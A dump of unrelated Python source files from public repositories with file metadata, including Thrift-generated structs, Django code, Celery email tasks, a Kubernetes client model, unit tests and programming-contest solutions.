iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('uploadFile_args')
if self.filedata is not None:
oprot.writeFieldBegin('filedata', TType.STRUCT, 1)
self.filedata.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(uploadFile_args)
uploadFile_args.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'filedata', [File, None], None, ), # 1
)
class uploadFile_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('uploadFile_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(uploadFile_result)
uploadFile_result.thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
)
fix_spec(all_structs)
del all_structs
|
[
"1322096624@qq.com"
] |
1322096624@qq.com
|
5cb291f086a1a6e113110c2af91826068dd57189
|
255e19ddc1bcde0d3d4fe70e01cec9bb724979c9
|
/all-gists/4287546/snippet.py
|
9124f440cdeccffaef8a4bd8d92dd5e133c999f6
|
[
"MIT"
] |
permissive
|
gistable/gistable
|
26c1e909928ec463026811f69b61619b62f14721
|
665d39a2bd82543d5196555f0801ef8fd4a3ee48
|
refs/heads/master
| 2023-02-17T21:33:55.558398
| 2023-02-11T18:20:10
| 2023-02-11T18:20:10
| 119,861,038
| 76
| 19
| null | 2020-07-26T03:14:55
| 2018-02-01T16:19:24
|
Python
|
UTF-8
|
Python
| false
| false
| 680
|
py
|
# FROM: http://en.wikipedia.org/wiki/Base_36#Python_implementation
def base36encode(number):
"""Converts an integer into a base36 string."""
ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    if not isinstance(number, int):
        raise TypeError('This function must be called on an integer.')
base36 = ''
sign = ''
if number < 0:
sign = '-'
number = -number
if 0 <= number < len(ALPHABET):
return sign + ALPHABET[number]
while number != 0:
number, i = divmod(number, len(ALPHABET))
base36 = ALPHABET[i] + base36
return sign + base36
def base36decode(number):
return int(number, 36)
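# Round-trip sanity check (assuming Python 3, where the original
# (int, long) check above reduces to a plain int check):
assert base36encode(123456789) == '21I3V9'
assert base36decode('21I3V9') == 123456789
assert base36encode(-255) == '-73'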
|
[
"gistshub@gmail.com"
] |
gistshub@gmail.com
|
666459957700b84b14bec98f21fbd9d2c6441c2b
|
7236d1d4873faa9735fd5e2d4598b211a370f731
|
/project/n/projects/projects/ecommapp/ecommerce/migrations/0020_auto_20200928_1630.py
|
7ceab26f28c88cea212b50ab80571813c500c591
|
[] |
no_license
|
Dreambigxz/my_first_django_app
|
05f5a5d330d72084489f9306fca9ca232af13999
|
9e21ebcbe63c7394280558d2977ef8a796960e0d
|
refs/heads/main
| 2023-01-03T18:45:20.712074
| 2020-10-23T09:05:47
| 2020-10-23T09:05:47
| 306,180,592
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 496
|
py
|
# Generated by Django 3.0.8 on 2020-09-28 15:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ecommerce', '0019_products_color'),
]
operations = [
migrations.AlterField(
model_name='products',
name='color',
field=models.CharField(choices=[('YL', 'Yellow'), ('RD', 'Red'), ('OR', 'Orange'), ('GR', 'Green')], default='RD', max_length=200),
),
]
|
[
"onyemordidaniel@gmail.com"
] |
onyemordidaniel@gmail.com
|
0209945db389ffcf041bf8356b57309837cca01c
|
bc233c24523f05708dd1e091dca817f9095e6bb5
|
/bitmovin_api_sdk/models/profile_h262.py
|
b8e281c4665dfd372553426648bec8a362d66ae8
|
[
"MIT"
] |
permissive
|
bitmovin/bitmovin-api-sdk-python
|
e3d6cf8eb8bdad62cb83ec77c0fc4950b06b9cdd
|
b0860c0b1be7747cf22ad060985504da625255eb
|
refs/heads/main
| 2023-09-01T15:41:03.628720
| 2023-08-30T10:52:13
| 2023-08-30T10:52:13
| 175,209,828
| 13
| 14
|
MIT
| 2021-04-29T12:30:31
| 2019-03-12T12:47:18
|
Python
|
UTF-8
|
Python
| false
| false
| 194
|
py
|
# coding: utf-8
from enum import Enum
from six import string_types, iteritems
from bitmovin_api_sdk.common.poscheck import poscheck_model
class ProfileH262(Enum):
MPEG2_422 = "MPEG2_422"
|
[
"openapi@bitmovin.com"
] |
openapi@bitmovin.com
|
27e87424929b5c8237e98b92155346589f22cff5
|
f00ad57c98e554470a72511dda7a7bfd160aca19
|
/others/test_compress_str.py
|
21fe737a9d075590a8f39e8909d0acdd69b93853
|
[] |
no_license
|
fanzhangg/algorithm-problems
|
d60115210aaaffcd094b34b9db5b46dadf93fe9e
|
43b111ad625f197ba0905abceab9ee4484284e08
|
refs/heads/master
| 2021-07-12T20:24:46.265700
| 2020-07-06T17:58:31
| 2020-07-06T17:58:31
| 171,220,135
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 211
|
py
|
from unittest import TestCase
from compress_string import compress_str
class TestCompressStr(TestCase):
def test_compress_str(self):
self.assertEqual(compress_str("AAAAaaBCCCDDe"), "A4a2B1C3D2e1")
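# A minimal run-length encoder consistent with the expected output
# (a sketch; the real compress_string implementation is not shown here):
def _compress_str_sketch(s):
    if not s:
        return ""
    out, prev, count = [], s[0], 1
    for ch in s[1:]:
        if ch == prev:
            count += 1
        else:
            out.append(prev + str(count))
            prev, count = ch, 1
    out.append(prev + str(count))
    return "".join(out)  # "AAAAaaBCCCDDe" -> "A4a2B1C3D2e1"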
|
[
"vanadiumzhang@gmail.com"
] |
vanadiumzhang@gmail.com
|
497ff7a37a21b8d7b26e76ad4a2070a35baf71cc
|
bb87afa0fd2f5466f282ba93779293449ae72e9f
|
/apps/article/tasks.py
|
0377213159cd91d4dfd25488e3ce850c0d8f288e
|
[
"MIT"
] |
permissive
|
xuechuance/website
|
14d50e6c66f4315f5829f5a2707fc7bdf3925266
|
91a017ea26806136a89f12d8620a4d99676a7497
|
refs/heads/master
| 2020-05-27T06:18:36.403271
| 2019-05-21T04:28:02
| 2019-05-21T04:28:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,889
|
py
|
from __future__ import absolute_import
import datetime
from configparser import ConfigParser
from time import sleep
import requests
from celery import shared_task
from django.core.mail import send_mail
import random
from apps.article.models import Headlines
from apps.user.models import VerifyCode
from website import settings
from website.celery import app
def random_str(randomlength=8):
    result = ""
    chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    length = len(chars) - 1
    for _ in range(randomlength):
        result += chars[random.randint(0, length)]
    print(result)
    return result
@app.task()
def send_register_email(email, username=None, token=None, send_type='register'):
    """
    Send emails for registration, login, and related flows
    :param email:
    :param username:
    :param token:
    :param send_type:
    :return:
    """
    code = random_str(4)
    email_title = ''
    email_body = ''
    if send_type == 'register':
        email_title = 'Account registration verification'
        email_body = "\n".join([u'{0}, welcome to my blog'.format(username),
                                u'Please visit this link to verify your account; it is valid for 1 hour',
                                '/'.join([settings.DOMAIN, 'activate', token])])
        print('======== sending email')
        send_status = send_mail(email_title, email_body, settings.EMAIL_HOST_USER, [email])
        if send_status:
            print('======== sent successfully')
    elif send_type == 'forget':
        VerifyCode.objects.create(code=code, email=email, send_type=send_type)
        email_title = 'Password reset link'
        email_body = "Your password reset code is {0}. Ignore this message if you did not request it; the code expires in 30 minutes.".format(code)
        print('======== sending email')
        send_status = send_mail(email_title, email_body, settings.EMAIL_HOST_USER, [email])
        if send_status:
            print('======== sent successfully')
    elif send_type == 'update_email':
        VerifyCode.objects.create(code=code, email=email, send_type=send_type)
        email_title = 'Email change link'
        email_body = "Your email change code is {0}. Ignore this message if you did not request it; the code expires in 30 minutes.".format(code)
        print('======== sending email')
        send_status = send_mail(email_title, email_body, settings.EMAIL_HOST_USER, [email])
        if send_status:
            print('======== sent successfully')
@app.task()
def error_email(email,title=None,body=None):
email_title = title
email_body = body
send_mail(email_title, email_body, settings.EMAIL_HOST_USER, [email])
@app.task()
def add():
    print('sending email to **************************************************************')
    sleep(5)  # sleep for 5 seconds
    print('success')
    return True
conf = ConfigParser()
conf.read('config.ini')
@app.task()
def getApi():
    print('Fetching data...')
    # url = 'http://api01.idataapi.cn:8000/article/idataapi?KwPosition=3&catLabel1=科技&apikey={0}'.format(conf.get('iDataApi','key'))
    url = 'http://v.juhe.cn/toutiao/index?type=keji&key={0}'.format(conf.get('AppKey', 'key'))
    headers = {
        "Accept-Encoding": "gzip",
        "Connection": "close"
    }
    try:
        r = requests.get(url, headers=headers)
        if r.status_code == requests.codes.ok:
            dict_json = r.json()
            list_dict = []
            for item in dict_json['result']['data']:
                # obj = Headlines(
                #     url=item['url'],
                #     title=item['title'],
                #     category=item['catLabel1'],
                #     conent=item['content'],
                #     author_name=item['sourceType'],
                # )
                obj = Headlines(
                    url=item['url'],
                    title=item['title'],
                    category=item['category'],
                    conent=item['title'],
                    author_name=item['author_name'],
                )
                list_dict.append(obj)
            Headlines.objects.bulk_create(list_dict)
            print('Data added successfully')
    except Exception as e:
        print('Failed to add data === emailing a notification to the admin', e)
        error_email.delay('tarena_feng@126.com', 'Data scraping error', '{0}'.format(e))
        print('Notification email sent')
@app.task()
def removeApi():
    # current date
    cur_date = datetime.datetime.now().date()
    # the previous day
    yester_day = cur_date - datetime.timedelta(days=1)
    # one week ago
    day = cur_date - datetime.timedelta(days=7)
    print("======= deleting data older than 7 days ======")
    # query rows older than one week; range would also work, here lte
    # (less than or equal) is used
    Headlines.objects.filter(add_time__lte=day).delete()
    print('====== deleted =========')
|
[
"tarena_feng@126.com"
] |
tarena_feng@126.com
|
21ee44b6155df6c86db7afac320d841dd0a6eea7
|
1d928c3f90d4a0a9a3919a804597aa0a4aab19a3
|
/python/zulip/2016/4/realm_filters.py
|
3ebd74a423ccd5d544621ba6011b7915cf5d5e90
|
[] |
no_license
|
rosoareslv/SED99
|
d8b2ff5811e7f0ffc59be066a5a0349a92cbb845
|
a062c118f12b93172e31e8ca115ce3f871b64461
|
refs/heads/main
| 2023-02-22T21:59:02.703005
| 2021-01-28T19:40:51
| 2021-01-28T19:40:51
| 306,497,459
| 1
| 1
| null | 2020-11-24T20:56:18
| 2020-10-23T01:18:07
| null |
UTF-8
|
Python
| false
| false
| 2,844
|
py
|
from __future__ import absolute_import
from __future__ import print_function
from optparse import make_option
from django.core.management.base import BaseCommand
from zerver.models import RealmFilter, all_realm_filters, get_realm
from zerver.lib.actions import do_add_realm_filter, do_remove_realm_filter
import sys
class Command(BaseCommand):
help = """Create a link filter rule for the specified domain.
NOTE: Regexes must be simple enough that they can be easily translated to JavaScript
RegExp syntax. In addition to JS-compatible syntax, the following features are available:
* Named groups will be converted to numbered groups automatically
* Inline-regex flags will be stripped, and where possible translated to RegExp-wide flags
Example: python2.7 manage.py realm_filters --realm=zulip.com --op=add '#(?P<id>[0-9]{2,8})' 'https://trac.humbughq.com/ticket/%(id)s'
Example: python2.7 manage.py realm_filters --realm=zulip.com --op=remove '#(?P<id>[0-9]{2,8})'
Example: python2.7 manage.py realm_filters --realm=zulip.com --op=show
"""
def add_arguments(self, parser):
parser.add_argument('-r', '--realm',
dest='domain',
type=str,
required=True,
help='The name of the realm to adjust filters for.')
parser.add_argument('--op',
dest='op',
type=str,
default="show",
help='What operation to do (add, show, remove).')
parser.add_argument('pattern', metavar='<pattern>', type=str, nargs='?', default=None,
help="regular expression to match")
parser.add_argument('url_format_string', metavar='<url pattern>', type=str, nargs='?',
help="format string to substitute")
def handle(self, *args, **options):
realm = get_realm(options["domain"])
if options["op"] == "show":
print("%s: %s" % (realm.domain, all_realm_filters().get(realm.domain, [])))
sys.exit(0)
pattern = options['pattern']
if not pattern:
self.print_help("python2.7 manage.py", "realm_filters")
sys.exit(1)
if options["op"] == "add":
url_format_string = options['url_format_string']
if not url_format_string:
self.print_help("python2.7 manage.py", "realm_filters")
sys.exit(1)
do_add_realm_filter(realm, pattern, url_format_string)
sys.exit(0)
elif options["op"] == "remove":
do_remove_realm_filter(realm, pattern)
sys.exit(0)
else:
self.print_help("python2.7 manage.py", "realm_filters")
sys.exit(1)
|
[
"rodrigosoaresilva@gmail.com"
] |
rodrigosoaresilva@gmail.com
|
94709ea9fdd3f5b965a753f366702dbec38c259a
|
c0c6b41523d8f8071c88d4320d9040a6d1d2e3f4
|
/problem1
|
80d2761714d5ce30c6ac12310c7fc42a98b8b028
|
[] |
no_license
|
GLAU-TND/python-programming-assignment-2-Manish-021
|
952cf9bd8a4f953074595f7c7d164541eba94443
|
782bdef864fadac653e500d03498de6c92c56382
|
refs/heads/master
| 2021-01-09T11:43:22.749103
| 2020-02-24T11:42:25
| 2020-02-24T11:42:25
| 242,287,538
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 225
|
t=eval(input())
b=[min(t)]
a=min(t)[-1]
t.remove(min(t))
for i in t:
for j in t:
if a==j[0] and j[-1]!=b[0][0]:
b.append(j)
a=j[-1]
t.remove(j)
break
b=b+t
print(b)
|
[
"noreply@github.com"
] |
GLAU-TND.noreply@github.com
|
|
81008224cac8591b4f00dcd38bf9b8e5cc34dc27
|
30ec40dd6a81dbee73e7f14c144e20495960e565
|
/kubernetes/client/models/v1beta1_http_ingress_rule_value.py
|
9653f80f26ca995284fb6ca79ec30368e71cd13e
|
[
"Apache-2.0"
] |
permissive
|
jonathan-kosgei/client-python
|
ae5a46968bcee19a3c62e1cefe227131ac9e7200
|
4729e6865d810824cafa312b4d06dfdb2d4cdb54
|
refs/heads/master
| 2021-01-20T14:59:10.435626
| 2017-05-08T16:55:51
| 2017-05-08T16:55:51
| 90,700,132
| 1
| 0
| null | 2017-05-09T03:50:42
| 2017-05-09T03:50:42
| null |
UTF-8
|
Python
| false
| false
| 3,300
|
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.6.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1HTTPIngressRuleValue(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, paths=None):
"""
V1beta1HTTPIngressRuleValue - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'paths': 'list[V1beta1HTTPIngressPath]'
}
self.attribute_map = {
'paths': 'paths'
}
self._paths = paths
@property
def paths(self):
"""
Gets the paths of this V1beta1HTTPIngressRuleValue.
A collection of paths that map requests to backends.
:return: The paths of this V1beta1HTTPIngressRuleValue.
:rtype: list[V1beta1HTTPIngressPath]
"""
return self._paths
@paths.setter
def paths(self, paths):
"""
Sets the paths of this V1beta1HTTPIngressRuleValue.
A collection of paths that map requests to backends.
:param paths: The paths of this V1beta1HTTPIngressRuleValue.
:type: list[V1beta1HTTPIngressPath]
"""
if paths is None:
raise ValueError("Invalid value for `paths`, must not be `None`")
self._paths = paths
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1HTTPIngressRuleValue):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
[
"mehdy@google.com"
] |
mehdy@google.com
|
a098dbcf2862c4b934dc7a374423ead058106d1c
|
1e84a9fec36deaf9a55a2734749ea035f72ac869
|
/KAKAO BLIND RECRUITMENT/2017/1차/다트 게임/refernece_code.py
|
f0d49073d4794a7333d54379d6f483324e86a55c
|
[] |
no_license
|
mgh3326/programmers_algorithm
|
aa3afc91231550e1fec2d72d90e85b140f79d677
|
b62f08ccccbdcac71e484d508985a5a9ce5f2434
|
refs/heads/master
| 2022-08-31T04:19:15.728666
| 2022-07-31T14:02:26
| 2022-07-31T14:02:26
| 201,747,526
| 0
| 0
| null | 2022-07-23T10:19:13
| 2019-08-11T10:02:15
|
Python
|
UTF-8
|
Python
| false
| false
| 601
|
py
|
def solution(dartResult):
point = []
answer = []
dartResult = dartResult.replace('10','k')
point = ['10' if i == 'k' else i for i in dartResult]
print(point)
i = -1
sdt = ['S', 'D', 'T']
for j in point:
if j in sdt :
answer[i] = answer[i] ** (sdt.index(j)+1)
elif j == '*':
answer[i] = answer[i] * 2
if i != 0 :
answer[i - 1] = answer[i - 1] * 2
elif j == '#':
answer[i] = answer[i] * (-1)
else:
answer.append(int(j))
i += 1
return sum(answer)
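# Quick checks against the KAKAO dart scoring rules (S/D/T raise the last
# throw to the 1st/2nd/3rd power, '*' doubles the last two throws, '#'
# negates the last one):
assert solution('1S2D*3T') == 37   # (1*2) + (2**2 * 2) + 3**3
assert solution('1D2S#10S') == 9   # 1**2 + (2 * -1) + 10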
|
[
"mgh3326@naver.com"
] |
mgh3326@naver.com
|
34c75ed85b11695edf53feaa3236244bd3fefc44
|
ac5e52a3fc52dde58d208746cddabef2e378119e
|
/exps-sblp-obt/sblp_ut=3.5_rd=1_rw=0.06_rn=4_u=0.075-0.325_p=harmonic-2/sched=RUN_trial=4/params.py
|
f2962918ddc7d0f6fada37b1a1592dedf23cce8d
|
[] |
no_license
|
ricardobtxr/experiment-scripts
|
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
|
7bcebff7ac2f2822423f211f1162cd017a18babb
|
refs/heads/master
| 2023-04-09T02:37:41.466794
| 2021-04-25T03:27:16
| 2021-04-25T03:27:16
| 358,926,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 247
|
py
|
{'cpus': 4,
'duration': 30,
'final_util': '3.668690',
'max_util': '3.5',
'periods': 'harmonic-2',
'release_master': False,
'res_distr': '1',
'res_nmb': '4',
'res_weight': '0.06',
'scheduler': 'RUN',
'trial': 4,
'utils': 'uni-medium-3'}
|
[
"ricardo.btxr@gmail.com"
] |
ricardo.btxr@gmail.com
|
5fc066834916a8dbb349035d834ab8ffcd3415d5
|
c3483984a4782be6097e4753de3cb545ae00039b
|
/geneticTest/unitTestingExample/unitTesting/test_Employee.py
|
e00ef30b7b7dd17f737f32a405b4966559a25522
|
[] |
no_license
|
nghiemphan93/machineLearning
|
67c3f60f317a0c753b465751113511baaefd1184
|
36d214b27c68d399f5494b5ec9b28fee74d57f7f
|
refs/heads/master
| 2020-03-28T02:20:11.843154
| 2020-02-03T14:18:39
| 2020-02-03T14:18:39
| 147,563,336
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,536
|
py
|
import unittest
from geneticTest.unitTestingExample.stuffToTest.Employee import Employee
class TestEmployee(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('setupClass')
@classmethod
def tearDownClass(cls):
print('teardownClass')
def setUp(self):
print('setUp')
self.emp_1 = Employee('Corey', 'Schafer', 50000)
self.emp_2 = Employee('Sue', 'Smith', 60000)
def tearDown(self):
print('tearDown\n')
def test_email(self):
print('test_email')
self.assertEqual(self.emp_1.email, 'Corey.Schafer@email.com')
self.assertEqual(self.emp_2.email, 'Sue.Smith@email.com')
self.emp_1.first = 'John'
self.emp_2.first = 'Jane'
self.assertEqual(self.emp_1.email, 'John.Schafer@email.com')
self.assertEqual(self.emp_2.email, 'Jane.Smith@email.com')
def test_fullname(self):
print('test_fullname')
self.assertEqual(self.emp_1.fullname, 'Corey Schafer')
self.assertEqual(self.emp_2.fullname, 'Sue Smith')
self.emp_1.first = 'John'
self.emp_2.first = 'Jane'
self.assertEqual(self.emp_1.fullname, 'John Schafer')
self.assertEqual(self.emp_2.fullname, 'Jane Smith')
def test_apply_raise(self):
print('test_apply_raise')
self.emp_1.apply_raise()
self.emp_2.apply_raise()
self.assertEqual(self.emp_1.pay, 52500)
self.assertEqual(self.emp_2.pay, 63000)
if __name__ == '__main__':
unittest.main()
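# A minimal sketch of the Employee class these tests assume (the real one
# lives in stuffToTest.Employee; the 5% raise matches 50000 -> 52500):
#
# class Employee:
#     raise_amt = 1.05
#     def __init__(self, first, last, pay):
#         self.first, self.last, self.pay = first, last, pay
#     @property
#     def email(self):
#         return '{}.{}@email.com'.format(self.first, self.last)
#     @property
#     def fullname(self):
#         return '{} {}'.format(self.first, self.last)
#     def apply_raise(self):
#         self.pay = int(self.pay * self.raise_amt)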
|
[
"nghiemphan93@gmail.com"
] |
nghiemphan93@gmail.com
|
56e2ea0cf73544e8dbe4bf9a62cade699f0cd4f7
|
353e6685be6737a828b8770d4d71e389ca2853b9
|
/0x11-python-network_1/5-hbtn_header.py
|
b7a195a4f570bbc400e36cfd7ab5c6a16a190e72
|
[] |
no_license
|
adebudev/holbertonschool-higher_level_programming
|
912af3f7caab3197beb062b5389f5b464b2ed177
|
cb0510ed0b6d7b7c43d0fd6949139b62e2bdede7
|
refs/heads/master
| 2022-12-18T17:40:28.539558
| 2020-09-25T04:29:45
| 2020-09-25T04:29:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 290
|
py
|
#!/usr/bin/python3
"""Request value X-Request-Id with requests Module"""
import requests
import sys
if __name__ == '__main__':
"""displays the value of the variable X-Request-Id"""
url = sys.argv[1]
R = 'X-Request-Id'
req = requests.get(url)
print(req.headers.get(R))
|
[
"delaasuncionbuelvasadrian@gmail.com"
] |
delaasuncionbuelvasadrian@gmail.com
|
63d41c42f8f87f62095b5bc99fda6d77e3eb4288
|
59788643fcce655a3a15ad0d3c91401a63e525d9
|
/home/models.py
|
f925cf6580cdcd1ae6f9a202aa595fe40ca9a4ba
|
[] |
no_license
|
crowdbotics-apps/element-28308
|
f39132662eb2e433d44e3c570ae539d9feae3db0
|
018966b7d47c9e2f9b1bb33c018d1a9b7a3b3b42
|
refs/heads/master
| 2023-06-06T09:31:10.513777
| 2021-06-29T20:33:03
| 2021-06-29T20:33:03
| 381,465,888
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 276
|
py
|
from django.conf import settings
from django.db import models
class CustomText(models.Model):
"Generated Model"
chart = models.URLField(
null=True,
blank=True,
)
class HomePage(models.Model):
"Generated Model"
body = models.TextField()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
b71cf501c6e9e920c344c180785088347c9eea05
|
398de9098811c7712b18f8e314340ce93aa86839
|
/id2date.py
|
7fc4502cd5258ae680b5604cba9dd53e78ba1f70
|
[] |
no_license
|
NiMaZi/thesis
|
0c2ce8bced070d010838bae80f844a46bb1a798c
|
15dc1aeca941f8feec4c283cd7436983ba982871
|
refs/heads/master
| 2020-03-18T13:19:52.711331
| 2018-07-09T12:11:08
| 2018-07-09T12:11:08
| 134,776,324
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,288
|
py
|
import os
import sys
import csv
import json
import boto3
import numpy as np
homedir=os.environ['HOME']
from elasticsearch import Elasticsearch
from elasticsearch.helpers import scan
es=Elasticsearch(['localhost:9200'])
s3 = boto3.resource("s3")
mybucket=s3.Bucket("workspace.scitodate.com")
s3key=sys.argv[1]
id2date={}
for i in range(0,15000):
try:
mybucket.download_file("yalun/"+s3key+"/abs"+str(i)+".txt",homedir+"/temp/tmptxt"+s3key+".txt")
except:
continue
f=open(homedir+"/temp/tmptxt"+s3key+".txt",'r',encoding='utf-8')
abstract=f.read().split(",")[0]
f.close()
results=scan(es,
query={
"query": {
"bool": {
"must": [{"match_phrase": {"abstract": abstract}}]
}
}
},
size=1
)
for n,result in enumerate(results):
if n>10:
break
if abstract in result['_source']['abstract']:
try:
id2date[i]=result['_source']['date']
except:
break
f=open(homedir+"/temp/id2date"+s3key+".json",'w')
json.dump(id2date,f)
f.close()
f=open(homedir+"/temp/id2date"+s3key+".json",'rb')
d=f.read()
f.close()
mybucket.put_object(Body=d,Key="yalun/"+s3key+"/id2date.json")
|
[
"zhengyl940425@gmail.com"
] |
zhengyl940425@gmail.com
|
6f781fbb34a0effb575b1359355f0db2026e382d
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5658571765186560_1/Python/dnutsch/problem_d.py
|
ec9d645f24bcbab7bf09cb17d6dd1abaea92f717
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992
| 2017-05-23T09:23:38
| 2017-05-23T09:23:38
| 84,313,442
| 2
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,111
|
py
|
#!/usr/bin/python
f = open('D-large.in','r');
out = open('D-large.out','w');
T = int(f.readline().strip())
for t in range(T):
X,R,C = [int(x) for x in f.readline().strip().split(' ')]
#print "x {}, r {}, c {}".format(X,R,C)
mx = max(R,C)
mn = min (R,C)
richard_wins = False
if (R*C) % X != 0:
richard_wins = True
if X >=7:
richard_wins = True # can make a donut
elif X > mx:
# maybe win by bisection, assume so
richard_wins = True
elif X == mx:
# maybe can bisect in minor dimension
if X >= 4 and X >= mn + (mn -1):
richard_wins = True
else:
#can't win by bisection, try squaring
if X >= 4 and mn < 2:
richard_wins = True
if X >= 9 and mn < 3:
richard_wins = True
if X >= 16 and mn < 4:
richard_wins = True
max_angle = 1+((X-1) // 2)
if max_angle > mn:
richard_wins = True
line = "Case #{}: {}".format(t+1, "RICHARD" if richard_wins else "GABRIEL")
print line
out.write(line+"\n")
f.close()
out.close()
|
[
"eewestman@gmail.com"
] |
eewestman@gmail.com
|